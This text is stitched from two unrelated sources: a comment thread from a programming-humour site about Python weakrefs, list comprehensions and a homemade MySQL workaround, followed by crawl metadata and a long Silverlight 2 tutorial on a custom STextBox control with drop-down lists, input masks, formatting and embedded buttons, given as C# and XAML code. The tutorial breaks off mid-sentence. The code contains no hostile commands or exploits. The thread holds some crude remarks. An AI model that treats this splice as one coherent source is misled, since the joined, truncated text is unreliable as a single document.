Weakref module, introduced in Python 2.1. (oh, and for the people who don't know python, it has at least 1 or 2 mysql modules, at least one of whom more or less compliant with Python's DB API 2.0) Admin Yes, it does. Use the weakref module. Admin I don't know - does C or C++? Admin Python is my favorite general-purpose scripting language (rather fond of JavaScript, but it has pretty narrow applications), but I didn't know about this syntax which still kind of blows my mind: This is definitely not typical Bourne-shell style. Seems like the bass-ackwards kind of thing that might be possible in Perl, however. Admin That's a list comprehension. It's equivalent to doing: Admin They don't need those temporary files proc_open -- Execute a command and open file pointers for input/output Admin oops. Didn't really read the code, beyond noticing mysql and the temp files. not php Admin, the python equivalent of php's proc_open Admin My goggles! The eyes do nothing! O_o Admin Interesting, though I find this concept kind of hard to... um... understand. Admin C++ - weak_ptr C - Shouldn't be hard to roll your own, what do you think most of these GC languages are written in? Admin Probably the original coder didn't have root to install the "official" MySQLdb package. Rather than annoy the sysadmin (or attempt to install the MySQLdb package in his home directory), he decided to take matters into his own hands. Admin Hey [I] , weren't there license restrictions with using MySQL client libraries - they first changed from lgpl -> gpl, then added the 3 licensing models: foss license, gpl license and commercial license? For a time being, the situation was gpl for client code. Dunno the exact circumstances today. [^o)]^ Also, efficient bulk importing and exporting are normally not exposed via python db api. Still WTF - for inserts etc this is weird. And the py is quite ugly. And os.system is very expensive on win32. [N] Admin Then you'll love generator expressions: gen_exp = (a for a in something if a == 'foo') will produce a generator which will produce the list of all values in 'something' that is 'foo'. So like a list comprehension but produces its values lazily. Produce a list from that with list(gen_exp) :) Admin List comprehensions are the gift from god. So many stupid for loops can be stuffed into a little list comprehension. If you want to have a crash course in generator expressions and list comprehensions, take a good look at the results of the Python Coding Contest[1] that was held in the last week of last year; nearly all solutions used three nested generator expressions, except the winning one, which managed to use only two. On second thoughts, maybe it's not so good for beginning Python coders to look at this code. ;-) [1] Admin fuck you guys are nerds go play wow or some shit
http://thedailywtf.com/articles/comments/Real_Coders_Don_0x27_t_Need_Drivers
CC-MAIN-2017-30
refinedweb
1,955
71.75
Known Folders Windows Vista introduces new storage scenarios and a new user profile namespace. To address these new factors, the older system of referring to standard folders by a CSIDL value has been replaced. As of Windows Vista, those folders are referenced by a new set of GUID values called Known Folder IDs. The Known Folder system provides these advantages: - Independent software vendors (ISVs) can extend the set of Known Folder IDs with their own. They can define folders, give them IDs, and register them with the system. CSIDL values could not be extended. - All Known Folders on a system can be enumerated. No API provided this functionality for CSIDL values. See IKnownFolderManager::GetFolderIds for more information. - A known folder added by an ISV can add custom properties that allow it to explain its purpose and intended use. - Many known folders can be redirected to new locations, including network locations. Under the CSIDL system, only the My Documents folder could be redirected. - Known folders can have custom handlers for use during creation or deletion. The CSIDL system and APIs that make use of CSIDL values are still supported for compatibility. However, it is not recommended to use them in any new development. The following topics discuss the specifics of the Known Folders system. - Working with Known Folders in Applications - How to Extend Known Folders with Custom Folders - KNOWNFOLDERID The following reference pages explain the Win32 Known Folders functions, which can be used to retrieve the location of Known Folders or redirect them to a new location. These functions replace older Win32 functions. The new functions are provided to give equivalent behavior to the old functions, but each new function is also duplicated by a Component Object Model (COM) API. The following reference pages explain the COM Known Folders APIs, which provide all of the functionality of the Win32 APIs listed above, plus add the ability to enumerate all Known Folders, access Known Folder properties, and extend the standard set of Known Folders. A C++ sample that demonstrates the Known Folder APIs is included in the Windows Software Development Kit (SDK). Once you have installed the Windows SDK on your computer, the sample can be found under %ProgramFiles%\Microsoft SDKs\Windows\v6.0\Samples\WinUI\Shell\AppPlatform\KnownFolders. Related topics
https://docs.microsoft.com/en-us/windows/desktop/shell/known-folders
CC-MAIN-2019-09
refinedweb
379
54.42
The Debug class defines a number of debug levels and a static public member giving the current debug level in a run. More... Debug #include <Debug.h> (requires the existence of fpu_controll.h on the platform). fpu_controll.h The Debug class defines a number of debug levels and a static public member giving the current debug level in a run. Definition at line 21 of file Debug.h. The different debug levels. No debugging. Lowest debug level. Some events are printed out. Higher debug level. All events are printed out. Highest possible debug level. Definition at line 28 of file Debug.h. Switch on or off a given debug item. If no such item exists, one will be created. Check if a given item should be debugged. If no such item is present false is returned. Definition at line 71 of file Debug.h. References full, maskFpuDenorm(), maskFpuDivZero(), maskFpuErrors(), maskFpuInvalid(), maskFpuOverflow(), maskFpuUnderflow(), noDebug, unmaskFpuDenorm(), unmaskFpuDivZero(), unmaskFpuErrors(), unmaskFpuInvalid(), unmaskFpuOverflow(), and unmaskFpuUnderflow(). A vector of switches indicating whether a given debug item is switched on or not. The index of a debug item has no special meaning. An implementor may assume that a given number corresponds to a certain request for debug output, but cannot be sure that someone else uses that number for some other purpose. Definition at line 54 of file Debug.h. If true, the debug level has been set from the outside from the calling program. This would then override any debug settings in the event generator. Definition at line 45 of file Debug.h.
https://thepeg.hepforge.org/doxygen/classThePEG_1_1Debug.html
CC-MAIN-2018-39
refinedweb
257
53.27
American football players "blocking" the kick, not "intercepting." Special thanks to Luciano Ramalho. I learned most of the knowledge about descriptors from his workshop in PyBay 2017 Have you seen this code or maybe have written code like this? from sqlalchemy import Column, Integer, String class User(Base): id = Column(Integer, primary_key=True) name = Column(String) This code snippet partially comes from the tutorial of a popular ORM package called SQLAlchemy. If you ever wonder why the attributes id and name aren't passed into the __init__ method and bind to the instance like regular class does, this post is for you. This post starts with explaining descriptors, why to use them, how to write them in previous Python versions (<= 3.5,) and finally writing them in Python 3.6 with the new feature described in PEP 487 -- Simpler customisation of class creation If you are in a hurry or you just want to know what's new, scroll all the way down to the bottom of this article. You'll find the whole code. What are descriptors A great definition of descriptor is explained by Raymond Hettinger in Descriptor HowTo Guide: In general, a descriptor is an object attribute with “binding behavior”, one whose attribute access has been overridden by methods in the descriptor protocol. Those methods are __get__(), __set__(), and __delete__(). If any of those methods are defined for an object, it is said to be a descriptor. There are three ways to access an attribute. Let's say we have the a attribute on the object obj: - To lookup its value, some_variable = obj.a, - To change its value, obj.a = 'new value', or - To delete it, del obj.a Python is dynamic and flexible to allow users intercept the above expression/statement and bind behaviors to them. Why you want to use descriptors Let's see an example: class Order: def __init__(self, name, price, quantity): self.name = name self.price = price self.quantity = quantity def total(self): return self.price * self.quantity apple_order = Order('apple', 1, 10) apple_order.total() # 10 Despite the lack of proper documentation, there is a bug: apple_order.quantity = -10 apple_order.total # -10, too good of a deal! Instead of using getter and setter methods and break the APIs, let's use property to enforce quantity be positive: class Order: def __init__(self, name, price, quantity): self._name = name self.price = price self._quantity = quantity # (1) @property def quantity(self): return self._quantity @quantity.setter def quantity(self, value): if value < 0: raise ValueError('Cannot be negative.') self._quantity = value # (2) ... apple_order.quantity = -10 # ValueError: Cannot be negative We transformed quantity from a simple attribute to a non-negative property. Notice line (1) that the attribute are renamed to _quantity to avoid line (2) getting a RecursionError. Are we done? Hell no. We forgot about the price attribute cannot be negative neither. It might be attempting to just create another property for price, but remember the DRY principle: when you find yourself doing the same thing twice, it's a good sign to extract the reusable code. Also, in our example, there might be more attributes need to be added into this class in the future. Repeating the code isn't fun for the writer or the reader. Let's see how to use descriptors to help us. How to write descriptors With the descriptors in place, our new class definition would become: class Order: price = NonNegative('price') # (3) quantity = NonNegative('quantity') Notice the class attributes defined before the __init__ method? It's a lot like the SQLAlchemy example showed on the very beginning of this post. This is where we are heading. We need to define the NonNegative class and implement the descriptor protocols. Here's how: class NonNegative: def __init__(self, name): self.name = name # (4) def __get__(self, instance, owner): return instance.__dict__[self.name] # (5) def __set__(self, instance, value): if value < 0: raise ValueError('Cannot be negative.') instance.__dict__[self.name] = value # (6) Line (4): the name attribute is needed because when the NonNegative object is created on line (3), the assignment to attribute named price hasn't happen yet. Thus, we need to explicitly pass the name price to the initializer of the object to use as the key for the instance's __dict__. Later, we'll see how in Python 3.6+ we can avoid the redundancy. The redundancy could be avoid in earlier versions of Python, but I think this would take too much effort to explain and is not the purpose of this post. Thus, not included. Line (5) and (6): instead of using builtin function getattr and setattr, we need to reach into the __dict__ object directly, because the builtins would be intercepted by the descriptor protocols too and cause the RecursionError. Welcome to Python 3.6+ We are still repeating ourself in line (3). How do I get a cleaner API to use such that we write: class Order: price = NonNegative() quantity = NonNegative() def __init__(self, name, price, quantity): ... Let's look at the new descriptor protocol in Python 3.6: object.__set_name__(self, owner, name) - Called at the time the owning class owner is created. The descriptor has been assigned to name. With this protocol, we could remove the __init__ and bind the attribute name to the descriptor: class NonNegative: ... def __set_name__(self, owner, name): self.name = name To put all the codes together: class NonNegative: def __get__(self, instance, owner): return instance.__dict__[self.name] def __set__(self, instance, value): if value < 0: raise ValueError('Cannot be negative.') instance.__dict__[self.name] = value def __set_name__(self, owner, name): self.name = name class Order: price = NonNegative() quantity = NonNegative() Conclusion Python is a general purpose programming language. I love that it not only has very powerful features that are highly flexible and could possibly bend the language tremendously (e.g. Meta Classes,) but also has high-level APIs/protocols to serve 99% of the needs (e.g. Descriptors.) I believe there's the right tool for the job. Descriptors are clearly the right tool for binding behaviors to attributes. Although Meta Classes could potentially do the same thing, Descriptor could solve the problem more gracefully. It's also pleasing to see Python evolve for serving general people's needs better. Here's my conclusion: - Python 3.6 is by far the greatest Python. - Descriptors are used to bind behaviors to accessing attributes. Discussion (4) Have you examined how well auto-complete and type-inference works when using descriptors for various IDEs? This is always the problem that I run into when working with new language features unfortunately. Hey Seth, no I haven't, although I feel most IDSs should have good support on descriptors since it's a well established feature from Python 2.2. The only new feature here is the __set_name__protocol that's been added since Python 3.6. Use WeakKeyDictionary instead of ordinary dictionaries when creating descriptor classes, else you will run into problems (bugs will appear) when you start to delete instances, as those instance won't get garbage deleted: Watch this: youtube.com/watch?v=lmcgtUw5djw time: (15:00) That's what I was looking for. Thank's a lot.
https://dev.to/dawranliou/writing-descriptors-in-python-36
CC-MAIN-2021-39
refinedweb
1,203
57.67
DMD 2.082.0 was released over the weekend. There were 28 major changes and 76 closed Bugzilla issues in this release, including some very welcome improvements in the toolchain. Head over to the download page to pick up the official package for your platform and visit the changelog for the details. Tooling improvements While there were several improvements and fixes to the compiler, standard library, and runtime in this release, there were some seemingly innocuous quality-of-life changes to the tooling that are sure to be greeted with more enthusiasm. DUB gets dubbier DUB, the build tool and package manager for D that ships with DMD, received a number of enhancements, including better dependency resolution, variable support in the build settings, and improved environment variable expansion. Arguably the most welcome change will be the removal of the regular update check. Previously, DUB would check for dependency updates once a day before starting a project build. If there was no internet connection, or if there were any errors in dependency resolution, the process could hang for some time. With the removal of the daily check, upgrades will only occur when running dub upgrade in a project directory. Add to that the brand new --dry-run flag to get a list of any upgradable dependencies without executing the upgrades. Signed binaries for Windows For quite some time users of DMD on Windows have had the annoyance of seeing a warning from Windows Smartscreen when running the installer, and the occasional false positive from AntiVirus software when running DMD. Now those in the Windows D camp can do a little victory dance, as all of the binaries in the distribution, including the installer, are signed with the D Language Foundation’s new code signing certificate. This is one more quality-of-life issue that can finally be laid to rest. On a side note, the cost of the certificate was the first expense entered into our Open Collective page. Compiler and libraries Many of the changes and updates in the compiler and library department are unlikely to compel anyone to shout from the rooftops, but a handful are nonetheless notable. The compiler One such is an expansion of the User-Defined Attribute syntax. Previously, these were only allowed on declarations. Now, they can be applied to function parameters: // Previously, it was illegal to attach a UDA to a function parameter void example(@(22) string param) { // It's always been legal to attach UDAs to type, variable, and function declarations. @(11) string var; pragma(msg, [__traits(getAttributes, var)] == [11]); pragma(msg, [__traits(getAttributes, param)] == [22]); } The same goes for enum members (it’s not explicitly listed in the highlights at the top of the changelog, but is mentioned in the bugfix list): enum Foo { @(10) one, @(20) two, } void main() { pragma(msg, [__traits(getAttributes, Foo.one)] == [10]); pragma(msg, [__traits(getAttributes, Foo.two)] == [20]); } The DasBetterC subset of D is enhanced in this release with some improvements. It’s now possible to use array literals in initializers. Previously, array literals required the use of TypeInfo, which is part of DRuntime and therefore unavailable in -betterC mode. Moreover, comparing arrays of structs is now supported and comparing arrays of byte-sized types should no longer generate any linker errrors. import core.stdc.stdio; struct Sint { int x; this(int v) { x = v;} } extern(C) void main() { // No more TypeInfo error in this initializer Sint[6] a1 = [Sint(1), Sint(2), Sint(3), Sint(1), Sint(2), Sint(3)]; foreach(si; a1) printf("%i\n", si.x); // Arrays/slices of structs can now be compared assert(a1[0..3] == a1[3..$]); // No more linker error when comparing strings, either explicitly // or implicitly such as in a switch. auto s = "abc"; switch(s) { case "abc": puts("Got a match!"); break; default: break; } // And the same goes for any byte-sized type char[6] a = [1,2,3,1,2,3]; assert(a[0..3] >= a[3..$]); puts("All the asserts passed!"); } DRuntime Another quality-of-life fix, this one touching on the debugging experience, is a new run-time flag that can be passed to any D program compiled against the 2.082 release of the runtime or later, --DRT-trapException=0. This allows exception trapping to be disabled from the command line. Previously, this was supported only via a global variable, rt_trapExceptions. To disable exception trapping, this variable had to be set to false before DRuntime gained control of execution, which meant implementing your own extern(C) main and calling _d_run_main to manually initialize DRuntime which, in turn, would run the normal D main—all of which is demonstrated in the Tip of the Week from the August 7, 2016, edition of This Week in D (you’ll also find there a nice explanation of why you might want to disable this feature. HINT: running in your debugger). A command-line flag is sooo much simpler, no? Phobos The std.array module has long had an array function that can be used to create a dynamic array from any finite range. With this release, the module gains a staticArray function that can do the same for static arrays, though it’s limited to input ranges (which includes other arrays). When the length of a range is not knowable at compile time, it must be passed as a template argument. Otherwise, the range itself can be passed as a template argument. import std.stdio; void main() { import std.range : iota; import std.array : staticArray; auto input = 3.iota; auto a = input.staticArray!2; pragma(msg, is(typeof(a) == int[2])); writeln(a); auto b = input.staticArray!(long[4]); pragma(msg, is(typeof(b) == long[4])); writeln(b); } September pumpkin spice Participation in the #dbugfix campaign for this cycle was, like last cycle, rather dismal. Even so, I’ll have an update on that topic later this month in a post of its own. Three of eight applicants were selected for the Symmetry Autumn of Code, which officially kicked off on September 1. Stay tuned here for a post on that topic as well. The blog has been quiet for a few weeks, but the gears are slowly and squeakily starting to grind again. Other posts lined up for this month include the next long-overdue installment in the GC Series and the launch of a new ‘D in Production’ profile.
https://dlang.org/blog/2018/09/04/dmd-2-082-0-released/
CC-MAIN-2022-27
refinedweb
1,065
61.26
This will be a PHP based website system. It will have an xml database for all content (no need for database software.) Also it will have the ability to use a template system that can easily accomodate flash and WYSYWIG tpl. flyweb created the I am submiting a PNG transparency fix for IE artifact flyweb commented on the unable to parse sections from xml file artifact flyweb commented on the unable to parse sections from xml file artifact Anonymous created the unable to parse sections from xml file artifact +converted symbols in html elements to greek equivelent so it will not break xml. Probably make a bbcode type implementation later on or use XML namespace. +directories are now created on installation process. +an atempt at prepping S-CMS for different ... flyweb commented on the Possible security risk in config.xml artifact flyweb created the Possible security risk in config.xml artifact In this new version we have updated the database engine from active-link.org. This gives us many more functions to work with. The installer is about %20 complete. We now have a new smarty plugin to handle the database queries depending on pagename.php ... flyweb commented on the RE: Preliminary install forum thread Copyright © 2009 SourceForge, Inc. All rights reserved. Terms of Use
http://sourceforge.net/projects/simpletoncms/
crawl-002
refinedweb
215
58.18
Spin Wait Spin Wait Spin Wait Spin Wait Struct Definition Provides support for spin-based waiting. public value class SpinWait public struct SpinWait type SpinWait = struct Public Structure SpinWait - Inheritance - Examples The following example shows how to use a SpinWait: using System; using System.Threading; using System.Threading.Tasks; class SpinWaitDemo { // Demonstrates: // SpinWait construction // SpinWait.SpinOnce() // SpinWait.NextSpinWillYield // SpinWait.Count static void Main() { bool someBoolean = false; int numYields = 0; // First task: SpinWait until someBoolean is set to true Task t1 = Task.Factory.StartNew(() => { SpinWait sw = new SpinWait(); while (!someBoolean) { // The NextSpinWillYield property returns true if // calling sw.SpinOnce() will result in yielding the // processor instead of simply spinning. if (sw.NextSpinWillYield) numYields++; sw.SpinOnce(); } // As of .NET Framework 4: After some initial spinning, SpinWait.SpinOnce() will yield every time. Console.WriteLine("SpinWait called {0} times, yielded {1} times", sw.Count, numYields); }); // Second task: Wait 100ms, then set someBoolean to true Task t2 = Task.Factory.StartNew(() => { Thread.Sleep(100); someBoolean = true; }); // Wait for tasks to complete Task.WaitAll(t1, t2); } } Imports System.Threading Imports System.Threading.Tasks Module SpinWaitDemo ' Demonstrates: ' SpinWait construction ' SpinWait.SpinOnce() ' SpinWait.NextSpinWillYield ' SpinWait.Count Private Sub SpinWaitSample() Dim someBoolean As Boolean = False Dim numYields As Integer = 0 ' First task: SpinWait until someBoolean is set to true Dim t1 As Task = Task.Factory.StartNew( Sub() Dim sw As New SpinWait() While Not someBoolean ' The NextSpinWillYield property returns true if ' calling sw.SpinOnce() will result in yielding the ' processor instead of simply spinning. If sw.NextSpinWillYield Then numYields += 1 End If sw.SpinOnce() End While ' As of .NET Framework 4: After some initial spinning, SpinWait.SpinOnce() will yield every time. Console.WriteLine("SpinWait called {0} times, yielded {1} times", sw.Count, numYields) End Sub) ' Second task: Wait 100ms, then set someBoolean to true Dim t2 As Task = Task.Factory.StartNew( Sub() Thread.Sleep(100) someBoolean = True End Sub) ' Wait for tasks to complete Task.WaitAll(t1, t2) End Sub End Module Remarks SpinWait encapsulates common spinning logic. On single-processor machines, yields are always used instead of busy waits, and on computers with Intel processors employing Hyper-Threading technology, it helps to prevent hardware thread starvation. SpinWait encapsulates a good mixture of spinning and true yielding. SpinWait is a value type, which means that low-level code can utilize SpinWait without fear of unnecessary allocation overheads. SpinWait is not generally useful for ordinary applications. In most cases, you should use the synchronization classes provided by the .NET Framework, such as Monitor. For most purposes where spin waiting is required, however, the SpinWait type should be preferred over the Thread.SpinWait method. Properties Methods Applies to Thread Safety While SpinWait is designed to be used in concurrent applications, it is not designed to be used from multiple threads concurrently. SpinWait members are not thread-safe. If multiple threads must spin, each should use its own instance of SpinWait. See also Feedback We'd love to hear your thoughts. Choose the type you'd like to provide: Our feedback system is built on GitHub Issues. Read more on our blog.
https://docs.microsoft.com/en-us/dotnet/api/system.threading.spinwait?redirectedfrom=MSDN&view=netframework-4.7.2
CC-MAIN-2019-09
refinedweb
509
60.61
TextBox( ComboBox, Masked TextBoxand More) s Inside thes Inside the - Introduction - Button - Predefined Buttons, ComboBoxand Erase Inside the TextBox - Having a Silverlight Headache!! - Formatting Behavior of STextBox - Masked Behavior of STextBox - Using a Maskor FormatLibrary (and International Features) - Validation of Data and Error Handling TextBox. STextBox is still a work in progress. As improvements become available, I will post new versions. I assume Microsoft will eventually release ComboBox and other functionality that will replace this control. Have fun! Many controls were included with the recent release of Silverlight 2b1, however a few controls were noticeably missing. For instance there is no ComboBox, no Masked TextBox and no TabControl. Since it will be very hard to develop a business application without such controls, we need to come up with some custom controls. The control presented here ( STextBox) helps out: By making the code public, I hope others can help to further improve the concept. When such improvements become available, I'll post them. I also have a working Tab Control. Once it is more “mature”, I might post that as well. Selectively I'll explain some of the features, workarounds and problems I encountered while creating this control. (Please review the source code and code samples for complete information.) Where possible, I'll refer to links that helped me out and/or other people who came up with suggestions or sample code. Some of the code is from the Microsoft source code, please note their license requirement (it is in the files to which it applies): // Copyright © Microsoft Corporation. // This source is subject to the Microsoft Source License for Silverlight Controls(March 2008 Release). // Please see for details. On my personal code I have no license requirement. Please use as you see fit! I'll take credits but accept no responsibility for failures. (What’s new, right?) Just as an example, for the longest time I have searched for a way to have the client display a byte array as an Image (using WCF, we receive an Image as a byte[] from the SQL database). That seems like a simple task, and while Image URLs work just fine displaying a JPG from a byte[] is next to impossible in ASP.NET (we used an HttpHandler –ashx-, but I just never appreciated the extra trip to the server). A few days ago I figured out how it is done in Silverlight 2.0 (I simply bind ImageSource to a slightly customized property): public ImageSource ThumbImage { get { if (Thumb == null) return null; if (Thumb.Bytes.IsEmpty()) return null; BitmapImage bitmap = new BitmapImage(); bitmap.SetSource(new MemoryStream(Thumb.Bytes)); return bitmap; } } I frequently use extension methods (like .IsEmpty() above). When you download the source code, you'll find them in the file SLHelpers.cs. After all, why type me.Visibility = Visibility.Visible when instead I can type me.Show(). Silverlight makes it easier to develop your own controls, so I spent a few days filling the gap in my “control library”. Microsoft was nice enough to release a mix08 source control library so we can peek at the way they created many of the standard controls ( TextBox and other basic elements are not included). The first thing I noticed was that Microsoft includes a Watermarked TextBox that actually does more than just provide a Watermark. It allows you to disable a TextBox (see top) and it has a FocusVisual so you can better see which TextBox has focus: However, strangely enough you cannot inherit your control from Watermarked TextBox for one major reason. The constructor calls a method SetStyle which loads the XAML code from the assembly and creates the control. SL2.0b1 does NOT allow you to load a Style more than once, so with a Style already loaded by the Watermarked TextBox constructor, there is not much you can do. For this reason, I have made a copy of this control (labelled SWatermarkedTextBox) with one minor but crucial change in it: protected virtual void SetStyle() { } Now we can override SetStyle, and enjoy the features of Enable/Disable, Watermark and focus at “no extra cost”: public class STextBox : SWatermarkedTextBox { } It is also interesting to see that WatermarkedTextBox does NOT use generic.xaml. Why would you want all your XAML code for controls to be in the same file anyway? Included with the sample code is a simple Page.XAML (notice the g: reference for the STextBox library): <UserControl x: <Grid x: </Grid> </UserControl> Within the UserControl you could also have a Canvas: <Canvas x: </Canvas> Figure 2 is the result of these lines: <g:STextBox x: <g:STextBox x: I have always enjoyed the 3rd party controls that would enable me to include all kinds of Buttons inside of the TextBox. Unlike Button which has a Content property and hence can be filled with anything you like, TextBox only has a Text property and does not allow you to fill the TextBox with other controls. In XAML, it looks like this: <g:STextBox x: <g:STextBox.Content> <StackPanel Orientation="Horizontal" Width="40" HorizontalAlignment="Left"> <Button x: <Button x: </StackPanel> </g:STextBox.Content> </g:STextBox> And it displays like this: One of the (failed) attempts I made was to have that collection respond to the usual Mouse events on the Buttons itself ( MouseOver, MouseClick). buttonElement.IsHitTestVisible = true; buttonElement.IsTabStop = tabStop; if buttonElement.Content is Control) { (buttonElement.Content as Control).IsHitTestVisible = true; (buttonElement.Content as Control).IsTabStop = tabStop; } Panel pnl = buttonElement.Content as Panel; if (pnl != null) { foreach (UIElement ctrl in pnl.Children) { if (ctrl is Control) { (ctrl as Control).IsHitTestVisible = true; (ctrl as Control).IsTabStop = tabStop; } } } That works fine to disable the TabStops on these buttons, but does nothing to make the content come alive ( HitTestVisible). So as a workaround, I handle mouse-over and mouse-click events inside the STextBox control. <g:STextBox x: <………> Hovering over one of the Buttons will change the mouse to “Hand” and when clicked, the ContentClick event will be executed. For example: private void Test6_ContentClick(object sender, RoutedEventArgs e) { if (sender == BLookup) "Lookup goes here".Alert(); if (sender == BHelp) "Help goes here".Alert(); } When adding a ListBox or an error indicator to the TextBox (as demonstrated below), we run into the same issue. The graphics work, but there is no keyboard or mouse control. It is for this reason that ListBox and error indicator are added to the parent control collection. We go up the control tree to find a Canvas or Grid where we can add these dynamic parts of STextBox. Adding these controls to the parent of STextBox works out fine, but it means we have to manually position the ListBox (or error indicator). Considering StackPanels, Grids, Margins etc., that is not an easy task. It works out in most cases I tested, but more complicated scenarios might fail to do proper positioning. The following XAML code demonstrates the predefined Button to erase the content of the TextBox ( EraseButtonName property): <g:STextBox x: <g:STextBox.Content> <Button x: </g:STextBox.Content> </g:STextBox> The following XAML code demonstrates the predefined Button for a DropDownList ( ComboBox): <Canvas> <g:STextBox x: <g:STextBox.Content> <Button x: </g:STextBox.Content> <g:STextBox.ListBoxContent> <ListBox x: <ListBoxItem Content="Option1"/> <ListBoxItem Content="Option2"/> <ListBoxItem Content="Option3"/> <ListBoxItem Content="Sample"/> <ListBoxItem Content="Option4"/> <ListBoxItem Content="Option5"/> <ListBoxItem Content="Option6"/> </ListBox> </g:STextBox.ListBoxContent> </g:STextBox> </Canvas> Some additional features: DropDownPosition, allows you to set where the ListBoxwill show in relationship to the TextBox(Top or Bottom and if it does not have the same width aligned to the right or the left). DropDownKey, sets the name of the hot-key that will show the ListBox(defaults to Down-key). StrictDropDown, when set to Truewill make the TextBoxentry ReadOnlyso the user can ONLY select values from the list. For the most part, keyboard control works as you would expect. There are a number of issues in the current setup: I was initially unable to make the correct initial item “Selected” in the dropdown. I fixed this with a Timer (the code is still in there since it is interesting to see this in Silverlight), but later I found a fix in SelectedIndexWorkAround. Using the mix08 samples from Mike Harsh, it was not very hard to enable the ListBox for scrolling with the mouse-wheel. An embedded JavaScript file takes care of the interaction and STextBox syncs the mouse-wheel events with the Listbox (if it has focus!). The weird thing with the current TabStop implementation, is that Silverlight attempts to Tab to controls that are not really visible. It is therefore important to set IsTabStop to false on anything that is not visible. For this reason, my extension methods on visibility ( .Hide(), .Show(), SetVisibility()) all call... private static void SyncTabStop(UIElement me, bool vis) { // for SL2.0b1, Collapsed with IsTabStop is a big issue... if (me == null) return; if (me is Control) { (me as Control).IsTabStop = vis; } else if (me is Border) { SyncTabStop((me as Border).Child, vis); } else if (me is Panel) { if (vis) (me as Panel).Children.StartTabKey(); else (me as Panel).Children.StopTabKey(); } } ... where StartTab and StopTab cycle through all children to set the IsTabStop property. Sadly once I make the ListBox visible I am unable to control TabStop behavior for the ListBox itself. Hence when you use Tab or Shift-Tab on the “popup” ListBox focus jumps to the addressbar or some other strange place. It would be nice if I could programmatically catch the Tab behavior and control it properly. This might sound similar but is not. When you look carefully at Figure 5, you see that the ListBox item “Sample” is selected, but the item “Option 1” has focus. I traced that to an oversight in the ListBox code where _tabOnceActiveElement is stubbornly reset to the first item no matter what you select. Only an actual mouse-click or keyboard event (up/down) can change this. So the strange behavior is that you open the listbox with keydown, but subsequent keyboard control will be based on the first item and not on the selected item. Now I also had a desire to retrieve the actual ListBoxItem. That seems easy but if you DataBind the ListBox to some collection, the items of the ListBox are of your collection type and not of type ListBoxItem (the latter one comes in handy for visual effects, focus etc.). Thirdly I would like to get the ElementScrollViewer (for instance to adjust the Height of the ListBox based on the number of items). I did figure out the code that I would like to add to the ListBox to fix various features: public void Set_tabOnceActiveElement() { _tabOnceActiveElement = GetListBoxItemForObject(Items[SelectedIndex]); if (_tabOnceActiveElement!=null) _tabOnceActiveElement.Focus(); } public ListBoxItem Get_ListBoxItemForObject(object value) { return GetListBoxItemForObject(value); } public ScrollViewer Get_ElementScrollViewer() { return ElementScrollViewer; } Normally I would have been able to make these simple adjustments by using reflection, and initially I attempted to do just that. BUT in Silverlight, reflection is not allowed to access any private/internal member and/or to Invoke any such method. That was much to my surprise but is further outlined here: In Silverlight, reflection cannot be used to access private types and members. If the access level of a type or member would prevent you from accessing it in statically compiled code, then you cannot access it dynamically by using reflection. That, to me is just very inconvenient and simply not in the .NET spirit. I can only assume there is some underlying major security risk that requires this limitation. It would not have been so bad if the Microsoft controls like ListBox did not mark almost ALL members at the lowest visibility (mostly internal due to unit testing). I subsequently tried to modify the Mix08 source code and create my own version of System.Windows.Control. That caused many undesirable side effects (vs XAML previewer died) and I am not so sure the Mix08 source code is completely identical to the released version. Since I was successful with making a copy of the WatermarkedTextBox, and reuse it after some minor changes (name and some resource strings), why not do that for ListBox…. However ListBox does not work by itself, it is dependent on many of the other controls and could not be moved into my own control assembly without its buddies. After moving over what seems like half the control library, I gave up. By just going through some normal form scenarios, I was quickly stuck on the next issue. I had several fields which would not display the way I liked. On an enum value with a dropdown ListBox, using a value converter worked fine. Isn't it great to use LINQ like this: public class DBCompanyEnumConverter : IValueConverter { public object Convert(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture) { if (CompanyEditor.Settings != null) { string name = (from e in CompanyEditor.Settings.CompanyEnums where e.DBCompanyEnumId == (byte)value select e.DBCompanyEnumName).FirstOrDefault(); return name; } return "Type " + value.ToString(); } public object ConvertBack(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture) { int Id = (from e in CompanyEditor.Settings.CompanyEnums where e.DBCompanyEnumName == (string) value select e.DBCompanyEnumId).FirstOrDefault(); return (byte)Id; } } BTW, in XAML you hook it up like this: <UserControl.Resources> <c:DBCompanyEnumConverter x: </UserControl.Resources> <……> <g:STextBox x: <g:STextBox.Content> <g:SButton x: </g:STextBox.Content> <g:STextBox.ListBoxContent> <ListBox Width="120" Height="140" DisplayMemberPath="DBCompanyEnumName"> </ListBox> </g:STextBox.ListBoxContent> </g:STextBox> Using standard .NET formatting, you can do a lot (when you use the Format property bind to Value instead of Text!!). In XAML, it looks like this (and binds to a double Markup): <g:STextBox x: private void OnValueChanged() { // also See OnLostFocus for reverse mapping... if (Value == null) base.Text = ""; else if (!String.IsNullOrEmpty(_Format)) { // tips see // and base.Text = String.Format(TextBoxCulture,"{0:" + _Format + "}", Value); } else base.Text = Value.ToString(); } When Focus is lost, STextBox attempts to do the reverse mapping (from Text and Format string to the Value object). if (!String.IsNullOrEmpty(_Format)) { // here handle any special "DEFORMATTING" tricks so the generic Convert.ChangeType will work... if (_Format.Contains("#%") || _Format.Contains("9%") || _Format.Contains("#'%") || _Format.Contains("9'%")) // % sign optional { input = input.Replace("%", ""); <....> } } <validation code> if (error == null) { Value = Convert.ChangeType(input, Value.GetType(), TextBoxCulture); // Value setter can also throw validation errors !! } Combined with a Value (see Formatting Behavior) or with a Text property binding you can use a Mask Value. When you bind to Value, as opposed to Text, STextBox will bind to a CLEAN version of the Text (where all formatting characters are removed). <g:STextBox x: Displays like this: Mask characters are almost identical to the characters Windows Masked TextBox (see the comments in file TextMaskController.cs). One exception, add a “*” in front of the mask and a user can type the * character followed by “free text”. After all, sometimes the preselected formatting just does not fit. <g:STextBox x: In addition, you can supply a MaxLength. Note however that you probably need a MaxLength one character more that the Mask (a Silverlight TextBox is always in “insert” mode and hence we need one extra character). While a mask works fine, when we handle different languages/countries, it does not work out (of course). Hence instead of Mask you can do MaskLib: <g:STextBox x: TextBox has a static CultureInfo: public static CultureInfo TextBoxCulture = CultureInfo.CurrentUICulture; If for demonstration we change that to TextBoxCulture = new CultureInfo("nl-NL"); Voila, we get to see a Dutch (NL for Netherlands) formatted ZIP code (4 numbers and 2 letters). The code that makes this happen is in ControlHelpers.cs: private static string MaskZIP(string country) { switch (country) { case "nl": return "0000-LL"; default: return "00000-9999"; // USA } } Of course my library of Masks is very rudimentary, but it will grow (help is welcome)! All that is left is validation of the data. It is okay for a ValueConverter or a 